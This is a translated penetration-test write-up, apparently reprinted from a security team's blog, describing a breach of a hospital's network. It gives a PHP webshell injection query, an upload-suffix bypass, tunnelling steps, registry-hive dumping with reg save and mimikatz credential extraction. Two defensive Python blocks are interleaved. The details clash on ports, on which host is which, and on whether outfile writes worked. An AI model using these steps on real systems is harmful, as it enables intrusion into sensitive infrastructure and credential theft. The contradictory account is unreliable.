0x00 Information Collection

We received an emergency penetration test task with nothing but a target name (a hospital) and one IP.

First, the IP was scanned across all ports with Goby:

The exposed services include WebLogic, JBoss, Spring Boot, Struts2 and assorted other systems (practically an N-day practice range).

0x01 External network penetration

Attempts at JBoss deserialization with jexboss, WebLogic (version 10.3.6.0) deserialization and other WebLogic CVEs, Spring Boot unauthenticated access, and Struts2 deserialization all failed.

However, a weak password (admin/admin) was found on the clinical skills center management platform on port 8282, which allowed login to the back end:

Testing showed that the image upload in the screen information management settings, under dictionary management, allows arbitrary file upload.

Upload the JSP with a .png suffix, intercept the request in Burp Suite, and change the suffix back to .jsp.
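The bypass above works because the upload check trusted the client-supplied suffix. As an added example (not from the original write-up), the following Python shows server-side validation that decides from the received bytes; the allowlist, file names and sample uploads are constructed for illustration.

```python
import os
import re
import secrets

# Allowlisted image types: extension -> magic bytes the content must start with.
IMAGE_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# Server-side script markers that have no business inside an image upload.
SCRIPT_MARKERS = re.compile(rb"<%|<\?php|<jsp:|<script", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). Every decision is made on the server from the
    bytes actually received; the client-supplied name only selects which
    signature is expected, so renaming the file in the proxy changes nothing."""
    ext = os.path.splitext(filename)[1].lower()
    sig = IMAGE_SIGNATURES.get(ext)
    if sig is None:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if not data.startswith(sig):
        return False, f"content does not match the {ext} signature"
    if SCRIPT_MARKERS.search(data):
        return False, "server-side script marker found inside image data"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Never store under the client's name: random base name plus the validated
    extension, so the uploader cannot choose what the web server will execute."""
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()


# Constructed samples (not from the write-up): a placeholder JSP page body sent
# under an image name, the same body with the suffix switched back to .jsp, a
# real PNG header with JSP appended, and a plain minimal PNG header.
JSP_BODY = b'<%@ page language="java" %><% out.println("placeholder"); %>'
REAL_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 17
SAMPLES = {
    "jsp_named_png": ("shell.png", JSP_BODY),
    "jsp_named_jsp": ("shell.jsp", JSP_BODY),
    "png_with_jsp_tail": ("logo.png", REAL_PNG + JSP_BODY),
    "real_png": ("logo.png", REAL_PNG),
}


def check_all() -> dict:
    """Map each sample name to whether the validator accepts it."""
    return {name: validate_upload(*args)[0] for name, args in SAMPLES.items()}
```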

After uploading, the target URL is reachable and the webshell exists, but connecting to it directly with Godzilla fails.

Master Hum then found that the current page's cookie is required when connecting: the target forces a redirect, and any request made without being logged in is sent back to the login page.

Because of this, the webshell URL cannot be reached normally. With the cookie attached, the webshell connects normally (once the cookie expires, the webshell drops).

Once connected, to make the webshell persistent we tried writing it to the web root and to the static file directory, but both were still affected by the forced redirect.

So the webshell content was written into a normal JSP file that is accessible before login, which stabilized the shell.

0x02 Intranet penetration

Next, information about the target was collected. The portal web server is a Linux host, it cannot accept large file uploads, its web paths are subject to the forced redirect, and its IP is 172.20.10.49.

First I tried Neo-reGeorg: I wrote the webshell to the website root and attached the cookie to the proxy requests, but it failed (I suspect because of the website's forced redirect).

Next I tried pystinger (Stinger). After uploading the server and webshell to the target, it would not run normally (the program reported an error, apparently a problem in the code).

So I switched back to Neo-reGeorg, and this time replaced a normal JSP page on the target website with the content of Neo-reGeorg's tunnel.jsp.

This page was not subject to the forced redirect (presumably the redirect is based on a whitelist of file names), and when connecting from the local machine the proxy worked normally (an error was reported but had no effect).

I then used Ladon through the forward proxy to scan the intranet (command: Ladon.exe 172.20.10.1/24 WebScan); the results are as follows:

One host has a phpStudy probe page, and the probe page reveals a weak MySQL password, root/root.

A directory scan found a phpMyAdmin page on the same IP, which root/root also logs into.

Testing showed that the database user lacks the file-write permission needed for outfile, but a shell can still be obtained through the general log.

Set general_log_file to 222.php in the website root.

Execute select '<?php phpinfo(); assert($_POST['cmd']); ?>' to get a shell.
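The general_log trick above leaves two traces a defender can look for: a general_log_file that points into the web root with a script extension, and a .php file that begins with the MySQL log banner. As an added example (not from the original write-up), this Python audits a SHOW VARIABLES snapshot and a file's contents for both; the snapshot, web root list and sample file are constructed, reusing only the path and file name the write-up mentions.

```python
import posixpath
import re

# Extensions the web server would execute if the log file lands under the web root.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}


def _norm(path: str) -> str:
    """Normalise separators and case so E:\\phpStudy\\WWW and e:/phpstudy/www compare equal."""
    return posixpath.normpath(path.replace("\\", "/")).lower().rstrip("/")


def audit_general_log(variables: dict, webroots: list) -> list:
    """Findings for a SHOW VARIABLES snapshot (name -> value) against known web roots."""
    findings = []
    log_file = _norm(variables.get("general_log_file", ""))
    if posixpath.splitext(log_file)[1] in SCRIPT_EXTS:
        findings.append(f"general_log_file has an executable extension: {log_file}")
    for root in webroots:
        r = _norm(root)
        if log_file == r or log_file.startswith(r + "/"):
            findings.append(f"general_log_file is inside web root {root}")
    if findings and variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: every query is being written there right now")
    return findings


# The general log starts with the server banner ("... Version: ... started with:").
# A .php file in the web root carrying that banner plus a PHP open tag is a query
# log that has been turned into a script.
LOG_BANNER = re.compile(rb"^[^\n]*Version:[^\n]*started with:", re.M)
PHP_TAG = re.compile(rb"<\?php", re.I)


def looks_like_log_webshell(data: bytes) -> bool:
    return bool(LOG_BANNER.search(data) and PHP_TAG.search(data))


# Constructed snapshot using the path and file name from the write-up.
SNAPSHOT = {"general_log": "ON", "general_log_file": "E:\\phpStudy\\WWW\\222.php"}
WEBROOTS = ["E:/phpStudy/WWW"]
# Constructed file content in the general-log layout (the logged query is benign).
SAMPLE_FILE = (
    b"mysqld, Version: 5.5.53 (MySQL Community Server (GPL)). started with:\n"
    b"TCP Port: 3306, Named Pipe: MySQL\n"
    b"Time                 Id Command    Argument\n"
    b"200101 12:00:00\t    7 Query\tselect '<?php phpinfo(); ?>'\n"
)
```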

This host turned out to be a Windows machine, and we had SYSTEM privileges on it, but it also has no outbound network access.

Checking the process list with tasklist against known antivirus processes showed that the host runs Kaspersky (process avp.exe).

Master CobaltZirs0n tried the shadow copy method to obtain the SYSTEM, SECURITY and SAM files for offline cracking, but after running wmic shadowcopy call create Volume='C:', querying with vssadmin list shadows raised an error saying the class is not registered.

Since we have SYSTEM privileges, we tried exporting the hives directly through PowerShell instead:

reg save hklm\system SYSTEM
reg save hklm\security SECURITY
reg save hklm\sam SAM

mimikatz extracted the hashes successfully (the password could not be cracked).

At this point there are three ways to log in to the remote desktop:

1. Add an account directly (Kaspersky does not block it)
2. Add a hidden (shadow) account
3. Use mimikatz pass-the-hash to inject the hash and log in as administrator through mstsc

We chose to add an account and log in, intending to use the host as a proxy to scan the intranet with fscan (the site was taken offline shortly after, so we went no deeper).

By then the administrator had presumably noticed the activity in the intranet and simply took the site offline.

0x03 Penetration Summary

1. Scanned the target IP with Goby and found WebLogic, JBoss, Spring Boot and Struts2 middleware components.
2. Tried deserialization attacks against WebLogic, JBoss and Struts2 without result, and tested Spring Boot for unauthenticated access, also without result.
3. On port 8082, found a weak password (admin/admin) on the clinical skills center management platform. In the back end, the image upload location has a file upload vulnerability; a JSP file was uploaded there and connected to through Godzilla. The connection failed at first: a cookie value has to be added to Godzilla's request configuration before it will connect (the website forces any page visited without logging in to redirect to the login page).
4. Neo-reGeorg's tunnel.jsp was uploaded through Godzilla, but accessing tunnel.jsp gave an error (the forced redirect is based on a file-name whitelist). The content of an existing page on the website was therefore replaced with the content of tunnel.jsp, after which it could be accessed normally.
5. reGeorg + Proxifier were used to set up a local SOCKS proxy. Through the proxy, the intranet segment of the target was scanned with Ladon.exe 172.20.10.1/24 WebScan, which found a phpStudy probe page on 172.20.10.49. Opening that page in chrome.exe through the proxy showed that its MySQL service has the weak password root/root.
6. Through the proxy, the directories of 172.20.10.49 were scanned with dirsearch, which found a phpMyAdmin page.
7. Through the proxy, 172.20.10.49/phpmyadmin was opened in chrome.exe and logged into with the weak password root/root. The website's absolute path was found with show variables like '%general%', and the webshell was written with select '<?php phpinfo(); assert($_POST['cmd']); ?>' into outfile 'E:/phpStudy/WWW/shell.php'; to get a shell.
8. Through the proxy, AntSword connected to 172.20.10.49/shell.php. tasklist showed that Kaspersky (avp.exe) is present on the system, and whoami showed SYSTEM privileges.
9. Executing wmic shadowcopy call create Volume='C:' and then querying with vssadmin list shadows gave an error saying the class is not registered.
10. Tried exporting the files directly through PowerShell (SYSTEM privileges required):
powershell reg save HKLM\SYSTEM E:/phpstudy/www/system
powershell reg save HKLM\SECURITY E:/phpstudy/www/security
powershell reg save HKLM\SAM E:/phpstudy/www/sam
11. mimikatz successfully extracted the hash values:
mimikatz # lsadump::sam /sam:sam.hiv /system:system.hiv

Reprinted from: Fight Tigers Team
